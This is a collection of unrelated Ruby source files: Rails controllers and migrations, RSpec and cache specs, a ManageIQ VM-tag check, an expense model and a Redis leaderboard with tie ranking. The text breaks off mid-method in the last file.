    subject{ Mushikago::Hanamgri::GetAnalysisRequest.new('domain_name', 'request_id')}

    it{ should be_kind_of(Mushikago::Http::GetRequest)}
    # Constructor arguments are exposed as readers and embedded in the path.
    its(:domain_name){ should == 'domain_name'}
    its(:request_id){ should == 'request_id'}
    its(:path){ should == '/1/hanamgri/domains/domain_name/analyses/request_id'}
  end
end
|
# Switches the default value of students.name to "hello".
class Changetodefault < ActiveRecord::Migration
  def change
    change_column :students, :name, :string, default: "hello"
  end
end
|
# JSON API for player assessments.
class Api::V1::AssessmentsController < ApplicationController
  # GET /assessments — lists every assessment.
  def index
    @assessments = Assessment.all
    render json: @assessments
  end

  # POST /assessments — creates an assessment from the permitted params.
  def create
    @assessment = Assessment.new(assessment_params)
    if @assessment.save
      render json: @assessment, status: :created
    else
      render json: @assessment.errors, status: :unprocessable_entity
    end
  end

  # GET — assessments belonging to one player.
  # Raises ActiveRecord::RecordNotFound when the player does not exist
  # (same as the original `Player.all.find(id)`, minus the needless
  # relation hop).
  def player_assessments
    @player = Player.find(params[:player_id])
    render json: @player.assessments
  end

  private

  # Strong-parameters whitelist; moved under `private` so it can never
  # be reached as a controller action.
  def assessment_params
    params.require(:assessment).permit(:rating, :user_id, :tournament_id, :player_id, :assessment_type)
  end
end
|
# frozen_string_literal: true

require 'dry/validation'

module Contract
  # Create Foo Contract: validates the params for creating a Foo.
  class CreateFoo < Dry::Validation::Contract
    params do
      # :name is mandatory and must be a non-empty string.
      required(:name).filled(:string)
    end
  end
end
|
##
# 짝지어 제거하기
# 문제 설명
# 짝지어 제거하기는, 알파벳 소문자로 이루어진 문자열을 가지고 시작합니다. 먼저 문자열에서 같은 알파벳이 2개 붙어 있는 짝을 찾습니다. 그다음, 그 둘을 제거한 뒤, 앞뒤로 문자열을 이어 붙입니다. 이 과정을 반복해서 문자열을 모두 제거한다면 짝지어 제거하기가 종료됩니다. 문자열 S가 주어졌을 때, 짝지어 제거하기를 성공적으로 수행할 수 있는지 반환하는 함수를 완성해 주세요. 성공적으로 수행할 수 있으면 1을, 아닐 경우 0을 리턴해주면 됩니다.
#
# 예를 들어, 문자열 S = baabaa 라면
#
# b aa baa → bb aa → aa →
#
# 의 순서로 문자열을 모두 제거할 수 있으므로 1을 반환합니다.
#
# 제한사항
# 문자열의 길이 : 1,000,000이하의 자연수
# 문자열은 모두 소문자로 이루어져 있습니다.
# 입출력 예
# s result
# baabaa 1
# cdcd 0
# 입출력 예 설명
# 입출력 예 #1
# 위의 예시와 같습니다.
# 입출력 예 #2
# 문자열이 남아있지만 짝지어 제거할 수 있는 문자열이 더 이상 존재하지 않기 때문에 0을 반환합니다.
#
# Pair-removal puzzle: repeatedly delete adjacent equal letters and close
# the gap; return 1 if the whole string can be eliminated, 0 otherwise.
#
# Stack approach: push each character unless it equals the top of the
# stack, in which case pop (the adjacent pair cancels). The string is
# fully removable iff the stack ends up empty. O(n) time and space.
#
# @param s [String] lowercase input string
# @return [Integer] 1 when fully removable, 0 otherwise
def solution(s = '')
  stack = []
  # each_char streams characters without allocating a full array
  # (the original used s.split('')).
  s.each_char do |c|
    if stack.last == c
      stack.pop
    else
      stack.push(c)
    end
  end
  stack.empty? ? 1 : 0
end

puts solution "cdcd"
|
# Sinatra-style CRUD controller for Building posts with photo attachments.
class BuildingController < ApplicationController
  # New-post form (requires a signed-in user).
  get '/new' do
    signed_in_user
    @title = t('create_record')
    # NOTE(review): the form is handed @post while create/edit render the
    # same template with @building — confirm which one the view reads.
    @post = Building.new
    slim :'buildings/new'
  end

  # Paginated index of all buildings.
  get '' do
    @title = t('building')
    @buildings = Building.all.paginate(per_page: 10, page: params[:page])
    slim :'buildings/index'
  end

  # Create a building owned by the current user, optionally with photos.
  post '' do
    @building = current_user.buildings.build(title: params[:building][:title],
                                             body: params[:building][:body])
    save_photo if params[:building][:photo]
    if @building.save
      # Fix: flash.now is discarded on redirect; plain flash survives it.
      flash[:success] = t('post_is_created')
      redirect "/buildings/#{@building.id}"
    else
      slim :'buildings/new'
    end
  end

  # Show a single building.
  get '/:id' do
    find_building(params[:id])
    @title = @building.title
    slim :'buildings/show'
  end

  # Edit form; only the owner may edit.
  get '/:id/edit' do
    find_building(params[:id])
    user_is_owner?(@building.id, 'Building')
    @title = t('edit_record')
    slim :'buildings/edit'
  end

  # Update a building: delete checked photos, attach new ones, save.
  # NOTE(review): unlike the edit form, no ownership check is performed
  # here (or in delete) — confirm whether that is intentional.
  put '/:id' do
    find_building(params[:id])
    if params[:building][:delphoto]
      ids = params[:building][:delphoto].map(&:to_i)
      # Fix: the delphoto checkboxes carry Photo ids, but the original
      # called Building.delete(ids), deleting unrelated Building rows.
      Photo.delete(ids)
    end
    save_photo if params[:building][:photo]
    if @building.update_attributes(title: params[:building][:title],
                                   body: params[:building][:body])
      redirect "/buildings/#{@building.id}"
    else
      slim :'buildings/edit'
    end
  end

  # Remove a building.
  delete '/:id' do
    @building = Building.find(params[:id])
    @building.destroy
  end

  private

  # Loads @building by id or redirects home with an error flash.
  def find_building(id)
    @building = Building.find(id)
  rescue ActiveRecord::RecordNotFound
    flash[:danger] = t('record_is_not_found')
    redirect '/'
  end

  # Builds and saves each uploaded photo on @building.
  def save_photo
    params[:building][:photo].each do |photo|
      @photo = @building.photos.build(:photo => photo)
      # NOTE(review): rendering here neither halts the request nor the
      # loop, so a failed photo save is effectively ignored — confirm.
      slim :'buildings/new' unless @photo.save
    end
  end
end
# TODO
# more specs for fragment caching:
# cache_get, cache_set, cached?, cache, expire
# Exercises fragment caching through CacheController actions and the
# CACHE store directly: set/get, expiry (single key, matching keys,
# timed, all) and round-tripping of Ruby objects.
describe "merb-cache-fragment" do
  it "should render index" do
    c = dispatch_to(CacheController, :index)
    c.body.should == "test index"
  end
  it "should cache the fragment (erb capture/concat)" do
    c = dispatch_to(CacheController, :action1)
    # NOTE(review): assigning the constant NOW inside an example makes the
    # later "use"/"refresh" examples depend on run order — consider a
    # shared let/before instead.
    NOW = c.body.strip
    c.cache_get("key1").strip.should == NOW
  end
  it "should cache the fragment (haml capture/concat)" do
    c = dispatch_to(CacheController, :action2)
    now = c.body.strip
    c.cache_get("key11").strip.should == now
    # A second dispatch after a delay must serve the cached fragment.
    sleep 1
    c = dispatch_to(CacheController, :action2)
    c.cache_get("key11").strip.should == now
    c.expire("key11")
    c.cache_get("key11").should be_nil
  end
  it "should use the fragment" do
    sleep 1
    c = dispatch_to(CacheController, :action1)
    c.body.strip.should == NOW
  end
  it "should expire the fragment" do
    CACHE.expire("key1")
    CACHE.cache_get("key1").should be_nil
  end
  it "should refresh the template" do
    # With "key1" expired above, the action must re-render fresh content.
    c = dispatch_to(CacheController, :action1)
    c.body.strip.should_not == NOW
  end
  it "should return nil for unknown keys" do
    CACHE.cache_get("unknown_key").should be_nil
  end
  it "should expire matching keys" do
    CACHE.cache_set("test1", "test1")
    CACHE.cache_get("test1").should == "test1"
    CACHE.cache_set("test2", "test2")
    CACHE.cache_get("test2").should == "test2"
    CACHE.cache_set("test3", "test3")
    CACHE.cache_get("test3").should == "test3"
    # :match expires every key with the given prefix.
    CACHE.expire(:match => "test")
    CACHE.cache_get("test1").should be_nil
    CACHE.cache_get("test2").should be_nil
    CACHE.cache_get("test3").should be_nil
  end
  it "should expire entry after 3 seconds" do
    # NOTE(review): the TTL passed is 0.05 while the example name says
    # "3 seconds" and the sleep is 3.5 — confirm the TTL's unit (minutes?).
    CACHE.cache_set("timed_key", "vanish in 3 seconds", 0.05)
    CACHE.cache_get("timed_key").should == "vanish in 3 seconds"
    sleep 3.5
    CACHE.cache_get("timed_key").should be_nil
  end
  it "should expire in many ways" do
    # Plain string key.
    CACHE.cache_set("test1", "test1")
    CACHE.expire("test1")
    CACHE.cache_get("test1").should be_nil
    # :key plus :params composes the full "key/param" cache key.
    CACHE.cache_set("test2/id1", "test2")
    CACHE.expire(:key => "test2", :params => %w(id1))
    CACHE.cache_get("test2/id1").should be_nil
    # :key alone.
    CACHE.cache_set("test3", "test3")
    CACHE.expire(:key => "test3")
    CACHE.cache_get("test3").should be_nil
    # :match => true expires everything under the composed prefix.
    CACHE.cache_set("test4/id1", "test4")
    CACHE.expire(:key => "test4", :params => %w(id1), :match => true)
    CACHE.cache_get("test4/id1/id2").should be_nil
  end
  it "should expire all keys" do
    CACHE.expire_all
    CACHE.cache_get("key1").should be_nil
  end
  it "should cache/restore ruby objects" do
    now = Time.now
    data = {:key1 => "key1", :key2 => "key2", :now => Time.now }
    CACHE.cache_set("key1", data)
    _data = CACHE.cache_get("key1")
    data.should == _data
  end
end
|
# Creates the candidatures join table: a volunteer applying to a gig,
# with an acceptance flag and an introduction letter.
class CreateCandidatures < ActiveRecord::Migration[5.0]
  def change
    create_table :candidatures do |t|
      t.references :gig, foreign_key: true
      t.references :volunteer, foreign_key: true
      t.boolean :accepted               # nil until reviewed
      t.text :introduction_letter
      t.timestamps
    end
  end
end
|
# frozen_string_literal: true

# Base API controller: JWT-based entity authorization plus symmetric
# message encryption/decryption helpers shared across the API.
class ApplicationController < ActionController::API
  # Resolves the entity (User or Guest) identified by the request's JWT.
  #
  # @return [Hash] { response: true, entity: <User|Guest> } on success
  # @raise [ActionController::InvalidAuthenticityToken] when the token is
  #   missing (raised inside #http_auth_header) or cannot be decoded
  # @raise [ActionController::RoutingError] if no entity resolves — in
  #   practice unreachable, since `find` raises RecordNotFound first
  def authorize_entity
    unless decoded_auth_token
      # BadRequest, InvalidAuthenticityToken, InvalidCrossOriginRequest, MethodNotAllowed, MissingFile, RenderError, RoutingError, SessionOverflowError, UnknownController, UnknownFormat, UnknownHttpMethod
      # 656444
      raise ActionController::InvalidAuthenticityToken, "Invalid Token"
    end
    @entity = if decoded_auth_token[:entity] == 'User'
                User.find(decoded_auth_token[:auth_entity_id])
              else
                Guest.find(decoded_auth_token[:auth_entity_id])
              end
    raise ActionController::RoutingError, 'Not Found' unless @entity
    {
      response: true,
      entity: @entity
    }
  end

  # Decodes the JWT from the Authorization header. Memoized so the token
  # is decoded once per request (the original decoded it on every call —
  # up to three times inside #authorize_entity alone).
  def decoded_auth_token
    @decoded_auth_token ||= JsonWebToken.decode(http_auth_header)
  end

  # Extracts the bearer token from the Authorization header.
  # @raise [ActionController::InvalidAuthenticityToken] when absent
  def http_auth_header
    if request.headers['Authorization'].present?
      request.headers['Authorization'].split(' ').last
    else
      raise ActionController::InvalidAuthenticityToken, "Missing Token"
    end
  end

  # Encrypts and signs a JSON payload.
  # NOTE(review): mutates the caller's payload by inserting the app
  # secret under "token" — confirm that side effect is intended.
  def encode_message(payload)
    payload["token"] = Rails.application.credentials.secret_key_base
    crypt = ActiveSupport::MessageEncryptor.new generate_key
    crypt.encrypt_and_sign(ActiveSupport::JSON.encode(payload))
  end

  # Inverse of #encode_message: verify, decrypt and JSON-decode.
  # (Misspelled name kept — callers depend on it.)
  def decrypte_message(token)
    crypt = ActiveSupport::MessageEncryptor.new generate_key
    ActiveSupport::JSON.decode(crypt.decrypt_and_verify(token))
  end

  # Strong parameters for checkout requests.
  def checkout_params
    params.require(:checkout).permit(:email, :name)
  end

  # Strong parameters for redirect-URL requests.
  # (camelCase name kept for compatibility with existing callers.)
  def redirectUrl_params
    params.require(:redirectUrl).permit(:path)
  end

  private

  # Derives the 32-byte encryption key from the credentials' token
  # password and salt. (Removed the redundant `key` local.)
  def generate_key
    ActiveSupport::KeyGenerator.new(
      Rails.application.credentials.token[:password]
    ).generate_key(
      Rails.application.credentials.token[:salt], 32
    )
  end
end
|
# Adds a string search_id column to lists (external search identifier).
class AddSearchIdToLists < ActiveRecord::Migration[5.2]
  def change
    add_column :lists, :search_id, :string
  end
end
|
require 'rails_helper'

# ActiveAdmin controller spec for LetterConversation administration.
# Covers: index listing and sidebar filters (sender/recipient name),
# new/create, edit, and show.
RSpec.describe Admin::LetterConversationsController, type: :controller do
  render_views

  let(:resource_class) { LetterConversation }
  let(:all_resources) { ActiveAdmin.application.namespaces[:admin].resources }
  let(:resource) { all_resources[resource_class] }
  # Capybara wrapper around the rendered body so node matchers work.
  let(:page) { Capybara::Node::Simple.new(response.body) }
  let!(:sender_user) { create(:user) }
  let!(:recipient_user) { create(:user) }
  let!(:letter_conversation) { create(:letter_conversation, sender_id: sender_user.id, recipient_id: recipient_user.id) }
  let!(:message) { create(:message, letter_conversation_id: letter_conversation.id, user_id: recipient_user.id) }
  # NOTE(review): attributes come from a :conversation factory while the model
  # under test is LetterConversation — confirm the factory name is intended.
  let(:valid_attributes) do
    FactoryGirl.attributes_for :conversation
  end
  let(:invalid_attributes) do
    { sender_id: '' }
  end

  login_admin

  describe "GET index" do
    it 'returns http success' do
      get :index
      expect(response).to have_http_status(:success)
    end
    it 'assigns the letter_conversation' do
      get :index
      expect(assigns(:letter_conversations)).to include(letter_conversation)
    end
    it "should render the expected columns" do
      get :index
      expect(page).to have_content(letter_conversation.id)
    end

    let(:filters_sidebar) { page.find('#filters_sidebar_section') }

    # Label texts are the Russian captions "Получатель" (recipient) and
    # "Отправитель" (sender).
    it "filter Recipient Name exists" do
      get :index
      expect(filters_sidebar).to have_css('label[for="q_recipient_name"]', text: 'Получатель')
      expect(filters_sidebar).to have_css('select[name="q[recipient_name_eq]"]')
    end
    it "filter Sender Name exists" do
      get :index
      expect(filters_sidebar).to have_css('label[for="q_sender_name"]', text: 'Отправитель')
      expect(filters_sidebar).to have_css('select[name="q[sender_name_eq]"]')
    end
    it "filter Recipient Name works" do
      matching_recipient_user = create(:user, name: 'test')
      non_matching_recipient_user = create(:user, name: 'non')
      matching_letter_conversation = create(:letter_conversation, sender_id: sender_user.id, recipient_id: matching_recipient_user.id)
      non_matching_letter_conversation = create(:letter_conversation, sender_id: sender_user.id, recipient_id: non_matching_recipient_user.id)
      matching_message = create(:message, letter_conversation_id: matching_letter_conversation.id, user_id: sender_user.id)
      non_matching_message = create(:message, letter_conversation_id: non_matching_letter_conversation.id, user_id: sender_user.id)
      get :index, q: { recipient_name_eq: 'test' }
      expect(assigns(:letter_conversations)).to include(matching_letter_conversation)
      expect(assigns(:letter_conversations)).not_to include(non_matching_letter_conversation)
    end
    it "filter Sender Name works" do
      matching_sender_user = create(:user, name: 'test')
      non_matching_sender_user = create(:user, name: 'non')
      matching_letter_conversation = create(:letter_conversation, sender_id: matching_sender_user.id, recipient_id: recipient_user.id)
      non_matching_letter_conversation = create(:letter_conversation, sender_id: non_matching_sender_user.id, recipient_id: recipient_user.id)
      matching_message = create(:message, letter_conversation_id: matching_letter_conversation.id, user_id: sender_user.id)
      non_matching_message = create(:message, letter_conversation_id: non_matching_letter_conversation.id, user_id: sender_user.id)
      get :index, q: { sender_name_eq: 'test' }
      expect(assigns(:letter_conversations)).to include(matching_letter_conversation)
      expect(assigns(:letter_conversations)).not_to include(non_matching_letter_conversation)
    end
  end

  describe "GET new" do
    it 'returns http success' do
      get :new
      expect(response).to have_http_status(:success)
    end
    it 'assigns the letter_conversation' do
      get :new
      expect(assigns(:letter_conversation)).to be_a_new(LetterConversation)
    end
    it "should render the form elements" do
      get :new
      expect(page).to have_field('Sender')
      expect(page).to have_field('Recipient')
    end
  end

  describe "POST create" do
    context "with valid params" do
      it "creates a new LetterConversation" do
        expect {
          post :create, :letter_conversation => valid_attributes
        }.to change(LetterConversation, :count).by(1)
      end
      it "assigns a newly created letter_conversation as @letter_conversation" do
        post :create, :letter_conversation => valid_attributes
        expect(assigns(:letter_conversation)).to be_a(LetterConversation)
        expect(assigns(:letter_conversation)).to be_persisted
      end
      it "redirects to the created letter_conversation" do
        post :create, :letter_conversation => valid_attributes
        expect(response).to have_http_status(:redirect)
        expect(response).to redirect_to(admin_letter_conversation_path(LetterConversation.last))
      end
      it 'should create the letter_conversation' do
        post :create, :letter_conversation => valid_attributes
        letter_conversation = LetterConversation.last
        expect(letter_conversation.sender_id).to eq(valid_attributes[:sender_id])
        expect(letter_conversation.recipient_id).to eq(valid_attributes[:recipient_id])
      end
    end
  end

  describe "GET edit" do
    it 'returns http success' do
      get :edit, id: letter_conversation
      expect(response).to have_http_status(:success)
    end
    it 'assigns the letter_conversation' do
      get :edit, id: letter_conversation
      expect(assigns(:letter_conversation)).to eq(letter_conversation)
    end
  end

  describe "GET show" do
    it 'returns http success' do
      get :show, id: letter_conversation
      expect(response).to have_http_status(:success)
    end
    it 'assigns the letter_conversation' do
      get :show, id: letter_conversation
      expect(assigns(:letter_conversation)).to eq(letter_conversation)
    end
    it "should render the form elements" do
      get :show, id: letter_conversation
      expect(page).to have_content(letter_conversation.sender.name)
      expect(page).to have_content(letter_conversation.recipient.name)
      expect(page).to have_content(message.body)
    end
  end
end
# ManageIQ Automate method: aborts the workflow (MIQ_ABORT) when the root VM
# carries the tag cloned/true; otherwise exits MIQ_OK. Any unexpected error
# logs a backtrace and exits MIQ_STOP.
$evm.log("info", "********* my_validate_tag - GetIP STARTED *********")
begin
  @method = 'my_validate_tag'
  $evm.log("info", "===== EVM Automate Method: <#{@method}> Started")
  # Enable verbose debug logging below.
  @debug = true
  # Log the inbound object
  $evm.log("info", "===========================================")
  process = $evm.object("process")
  $evm.log("info", "Listing Process Attributes:")
  process.attributes.sort.each { |k, v| $evm.log("info", "\t#{k}: #{v}")} if @debug
  $evm.log("info", "===========================================")

  # Walk from the root VM to its management system and host, logging each.
  vm = $evm.root['vm']
  $evm.log("info", "Got VM from root object")
  $evm.log("info","Inspecting vm: #{vm.inspect}") if @debug
  ems = vm.ext_management_system
  $evm.log("info", "Got EMS <#{ems.name}> from VM <#{vm.name}>")
  $evm.log("info","Inspecting ems: #{ems.inspect}") if @debug
  host = vm.host
  $evm.log("info", "Got Host <#{host.name}> from VM <#{vm.name}>")
  $evm.log("info","Inspecting host: #{host.inspect}") if @debug

  # Tags come back as "category/value" strings; abort on cloned/true.
  tags = vm.tags
  $evm.log("info", "#{@method} Template Tags - #{vm.tags}")
  tags.each do |t|
    s = t.split("/")
    if s[0] == 'cloned'
      if s[1] == 'true'
        $evm.log("error", "<#{@method}>: VM Tagged with <#{s[0]}> y <#{s[1]}>")
        exit MIQ_ABORT
      end
    end
  end
  #
  # Exit method
  #
  $evm.log("info", "<#{@method}>--===== #{vm.name} not tagged with tag cloned ========")
  $evm.log("info", "===== EVM Automate Method: <#{@method}> Ended")
  exit MIQ_OK
rescue => err
  $evm.log("error", "<#{@method}>: [#{err}]\n#{err.backtrace.join("\n")}")
  exit MIQ_STOP
end
|
require File.expand_path(File.dirname(__FILE__) + '/page_object')

# Page object for the JSON API endpoints under /api/.
class ApiPage < PageObject
  def initialize(page)
    super(page)
    @url_base = '/api/'
  end

  # Visit a person's subscriptions endpoint.
  #
  # person - a model responding to #id, or anything coercible to an integer id.
  # type   - optional subscription type; appended (singularized) as a query
  #          parameter when given.
  def visit_subscriptions(person, type = nil)
    id = person.respond_to?(:id) ? person.id : person.to_i
    path = "#{@url_base}#{id}/subscriptions"
    path = "#{path}?type=#{type.singularize}" unless type.nil?
    visit path
  end
end
|
# An employee expense claim. Belongs to a user and a category, moves through
# the Pending -> Approved/Rejected workflow, and is indexed in Solr
# asynchronously (delayed_job's handle_asynchronously wraps solr_index).
class Expense < ActiveRecord::Base
  STATUSES = %w(Pending Approved Rejected)

  belongs_to :user
  belongs_to :category
  has_one :expense_job_title_assignment
  # Fixed: :class_name must be a String, not the constant itself — passing the
  # constant forces eager loading and is unsupported in newer Rails versions.
  has_one :job_title_assignment, through: :expense_job_title_assignment, class_name: 'JobTitleAssignment'

  validates :user, :date, :category, :description, :amount, presence: true
  validates :status, inclusion: { in: STATUSES, allow_blank: false }
  validates :currency, inclusion: { in: ExchangeRate::CURRENCIES, allow_blank: false }

  delegate :name, to: :category, prefix: true
  delegate :name, to: :user, prefix: true
  delegate :job_title, :department, to: :job_title_assignment, allow_nil: true
  delegate :name, to: :department, prefix: true, allow_nil: true
  delegate :name, to: :job_title, prefix: true, allow_nil: true

  scope :rejected, -> { where(status: "Rejected") }
  scope :pending, -> { where(status: "Pending") }
  scope :approved, -> { where(status: "Approved") }
  # Month is matched as a 'YYYY-MM' string (PostgreSQL to_char).
  scope :for_month, lambda { |month| where("to_char(date, 'YYYY-MM') = ?", month) }

  # Sunspot/Solr index definition: full-text fields plus sortable copies
  # (s_-prefixed) of each column.
  searchable do
    integer :user_id
    text :user_name, :department_name, :job_title_name, :date, :category_name, :description, :currency, :amount, :status
    string :s_user_name do user_name end
    string :s_department_name do department_name end
    string :s_job_title_name do job_title_name end
    date :s_date do date end
    string :s_category_name do category_name end
    string :s_description do description end
    string :s_currency do currency end
    double :s_amount do amount end
    string :s_status do status end
  end
  handle_asynchronously :solr_index

  # In theory, currency should not have to be sanitized because it comes from
  # the expenses.currency database column, which should have been validated
  # against a list of approved currencies. This method and the
  # self.joins_exchange_rates methods sanitize them anyways just in case.
  #
  # Returns the sum of the relation's amounts expressed in +currency+,
  # converting foreign-currency rows through exchange_rates.rate.
  def self.sum_in(currency)
    joins_exchange_rates(currency)
      .sum("CASE WHEN expenses.currency = #{sanitize(currency)} THEN expenses.amount ELSE (expenses.amount * exchange_rates.rate) END")
  end

  def approved?
    status == "Approved"
  end

  def rejected?
    status == "Rejected"
  end

  def pending?
    status == "Pending"
  end

  # Joins the exchange rate that was effective on each expense's date for the
  # target currency. Note: a bare `private` marker has no effect on class
  # methods, so the misleading one that preceded this definition was removed;
  # visibility is enforced by private_class_method below.
  def self.joins_exchange_rates(currency)
    joins("LEFT OUTER JOIN exchange_rates
      ON exchange_rates.anchor = expenses.currency
      AND exchange_rates.float = #{sanitize(currency)}
      AND expenses.date BETWEEN exchange_rates.starts_on AND exchange_rates.ends_on")
  end
  private_class_method :joins_exchange_rates
end
|
require 'leaderboard'

# Leaderboard variant in which members with equal scores share the same rank.
# Alongside the main sorted set it maintains a "ties" sorted set containing
# the distinct scores (stored as their Float#to_s representation); a member's
# rank is the rank of its score within that set.
class TieRankingLeaderboard < Leaderboard
  # Default options when creating a leaderboard. Page size is 25 and reverse
  # is set to false, meaning various methods will return results in
  # highest-to-lowest order.
  DEFAULT_OPTIONS = {
    :page_size => DEFAULT_PAGE_SIZE,
    :reverse => false,
    :member_key => :member,
    :rank_key => :rank,
    :score_key => :score,
    :member_data_key => :member_data,
    :member_data_namespace => 'member_data',
    :ties_namespace => 'ties'
  }

  # Create a new instance of a leaderboard.
  #
  # @param leaderboard [String] Name of the leaderboard.
  # @param options [Hash] Options for the leaderboard such as +:page_size+.
  # @param redis_options [Hash] Options for configuring Redis.
  #
  # Examples
  #
  #   leaderboard = Leaderboard.new('highscores')
  #   leaderboard = Leaderboard.new('highscores', {:page_size => 10})
  def initialize(leaderboard_name, options = DEFAULT_OPTIONS, redis_options = DEFAULT_REDIS_OPTIONS)
    super

    leaderboard_options = DEFAULT_OPTIONS.dup
    leaderboard_options.merge!(options)

    @ties_namespace = leaderboard_options[:ties_namespace]
  end

  # Delete the named leaderboard.
  #
  # @param leaderboard_name [String] Name of the leaderboard.
  def delete_leaderboard_named(leaderboard_name)
    @redis_connection.multi do |transaction|
      transaction.del(leaderboard_name)
      transaction.del(member_data_key(leaderboard_name))
      transaction.del(ties_leaderboard_key(leaderboard_name))
    end
  end

  # Change the score for a member in the named leaderboard by a delta which can be positive or negative.
  #
  # @param leaderboard_name [String] Name of the leaderboard.
  # @param member [String] Member name.
  # @param delta [float] Score change.
  def change_score_for_member_in(leaderboard_name, member, delta)
    # NOTE(review): score_for reads the instance's default leaderboard —
    # confirm behavior when leaderboard_name differs from the default.
    previous_score = score_for(member)
    new_score = previous_score + delta
    total_members_at_previous_score = @redis_connection.zrevrangebyscore(leaderboard_name, previous_score, previous_score)

    @redis_connection.multi do |transaction|
      transaction.zadd(leaderboard_name, new_score, member)
      transaction.zadd(ties_leaderboard_key(leaderboard_name), new_score, new_score.to_f.to_s)
    end

    # Drop the old score from the ties set only when this member was its last
    # holder; otherwise other members still rank by it.
    if total_members_at_previous_score.length == 1
      @redis_connection.zrem(ties_leaderboard_key(leaderboard_name), previous_score.to_f.to_s)
    end
  end

  # Rank a member in the named leaderboard.
  #
  # @param leaderboard_name [String] Name of the leaderboard.
  # @param member [String] Member name.
  # @param score [float] Member score.
  # @param member_data [String] Optional member data.
  def rank_member_in(leaderboard_name, member, score, member_data = nil)
    @redis_connection.multi do |transaction|
      transaction.zadd(leaderboard_name, score, member)
      transaction.zadd(ties_leaderboard_key(leaderboard_name), score, score.to_f.to_s)
      transaction.hset(member_data_key(leaderboard_name), member, member_data) if member_data
    end
  end

  # Rank a member across multiple leaderboards.
  #
  # @param leaderboards [Array] Leaderboard names.
  # @param member [String] Member name.
  # @param score [float] Member score.
  # @param member_data [String] Optional member data.
  def rank_member_across(leaderboards, member, score, member_data = nil)
    @redis_connection.multi do |transaction|
      leaderboards.each do |leaderboard_name|
        transaction.zadd(leaderboard_name, score, member)
        transaction.zadd(ties_leaderboard_key(leaderboard_name), score, score.to_f.to_s)
        transaction.hset(member_data_key(leaderboard_name), member, member_data) if member_data
      end
    end
  end

  # Rank an array of members in the named leaderboard.
  #
  # @param leaderboard_name [String] Name of the leaderboard.
  # @param members_and_scores [Splat or Array] Variable list of members and scores
  def rank_members_in(leaderboard_name, *members_and_scores)
    if members_and_scores.is_a?(Array)
      members_and_scores.flatten!
    end

    @redis_connection.multi do |transaction|
      members_and_scores.each_slice(2) do |member_and_score|
        transaction.zadd(leaderboard_name, member_and_score[1], member_and_score[0])
        # Fixed: the ties set must record the SCORE (member_and_score[1]),
        # matching rank_member_in/rank_member_across; previously the member
        # (index 0) was stored as both score and value, corrupting tie ranks.
        transaction.zadd(ties_leaderboard_key(leaderboard_name), member_and_score[1], member_and_score[1].to_f.to_s)
      end
    end
  end

  # Remove a member from the named leaderboard.
  #
  # @param leaderboard_name [String] Name of the leaderboard.
  # @param member [String] Member name.
  def remove_member_from(leaderboard_name, member)
    member_score = @redis_connection.zscore(leaderboard_name, member) || nil
    # The score leaves the ties set only when no other member still holds it.
    can_delete_score = member_score && members_from_score_range_in(leaderboard_name, member_score, member_score).length == 1

    @redis_connection.multi do |transaction|
      transaction.zrem(leaderboard_name, member)
      transaction.zrem(ties_leaderboard_key(leaderboard_name), member_score.to_f.to_s) if can_delete_score
      transaction.hdel(member_data_key(leaderboard_name), member)
    end
  end

  # Retrieve the rank for a member in the named leaderboard.
  #
  # @param leaderboard_name [String] Name of the leaderboard.
  # @param member [String] Member name.
  #
  # @return the rank for a member in the leaderboard (1-based), or nil when
  #   the member's score is not present in the ties set.
  def rank_for_in(leaderboard_name, member)
    member_score = score_for_in(leaderboard_name, member)
    if @reverse
      return @redis_connection.zrank(ties_leaderboard_key(leaderboard_name), member_score.to_f.to_s) + 1 rescue nil
    else
      return @redis_connection.zrevrank(ties_leaderboard_key(leaderboard_name), member_score.to_f.to_s) + 1 rescue nil
    end
  end

  # Retrieve the score and rank for a member in the named leaderboard.
  #
  # @param leaderboard_name [String] Name of the leaderboard.
  # @param member [String] Member name.
  #
  # @return the score and rank for a member in the named leaderboard as a Hash.
  def score_and_rank_for_in(leaderboard_name, member)
    member_score = @redis_connection.zscore(leaderboard_name, member)
    responses = @redis_connection.multi do |transaction|
      transaction.zscore(leaderboard_name, member)
      if @reverse
        transaction.zrank(ties_leaderboard_key(leaderboard_name), member_score.to_f.to_s)
      else
        transaction.zrevrank(ties_leaderboard_key(leaderboard_name), member_score.to_f.to_s)
      end
    end

    responses[0] = responses[0].to_f if responses[0]
    responses[1] = responses[1] + 1 rescue nil

    {@member_key => member, @score_key => responses[0], @rank_key => responses[1]}
  end

  # Remove members from the named leaderboard in a given score range.
  #
  # @param leaderboard_name [String] Name of the leaderboard.
  # @param min_score [float] Minimum score.
  # @param max_score [float] Maximum score.
  def remove_members_in_score_range_in(leaderboard_name, min_score, max_score)
    @redis_connection.multi do |transaction|
      transaction.zremrangebyscore(leaderboard_name, min_score, max_score)
      transaction.zremrangebyscore(ties_leaderboard_key(leaderboard_name), min_score, max_score)
    end
  end

  # Expire the given leaderboard in a set number of seconds. Do not use this with
  # leaderboards that utilize member data as there is no facility to cascade the
  # expiration out to the keys for the member data.
  #
  # @param leaderboard_name [String] Name of the leaderboard.
  # @param seconds [int] Number of seconds after which the leaderboard will be expired.
  def expire_leaderboard_for(leaderboard_name, seconds)
    @redis_connection.multi do |transaction|
      transaction.expire(leaderboard_name, seconds)
      transaction.expire(ties_leaderboard_key(leaderboard_name), seconds)
      transaction.expire(member_data_key(leaderboard_name), seconds)
    end
  end

  # Expire the given leaderboard at a specific UNIX timestamp. Do not use this with
  # leaderboards that utilize member data as there is no facility to cascade the
  # expiration out to the keys for the member data.
  #
  # @param leaderboard_name [String] Name of the leaderboard.
  # @param timestamp [int] UNIX timestamp at which the leaderboard will be expired.
  def expire_leaderboard_at_for(leaderboard_name, timestamp)
    @redis_connection.multi do |transaction|
      transaction.expireat(leaderboard_name, timestamp)
      transaction.expireat(ties_leaderboard_key(leaderboard_name), timestamp)
      transaction.expireat(member_data_key(leaderboard_name), timestamp)
    end
  end

  # Retrieve a page of leaders from the named leaderboard for a given list of members.
  #
  # @param leaderboard_name [String] Name of the leaderboard.
  # @param members [Array] Member names.
  # @param options [Hash] Options to be used when retrieving the page from the named leaderboard.
  #
  # @return a page of leaders from the named leaderboard for a given list of members.
  def ranked_in_list_in(leaderboard_name, members, options = {})
    leaderboard_options = DEFAULT_LEADERBOARD_REQUEST_OPTIONS.dup
    leaderboard_options.merge!(options)

    ranks_for_members = []

    # Pipeline the per-member rank/score lookups; responses alternate
    # [rank, score, rank, score, ...].
    responses = @redis_connection.multi do |transaction|
      members.each do |member|
        if @reverse
          transaction.zrank(leaderboard_name, member)
        else
          transaction.zrevrank(leaderboard_name, member)
        end
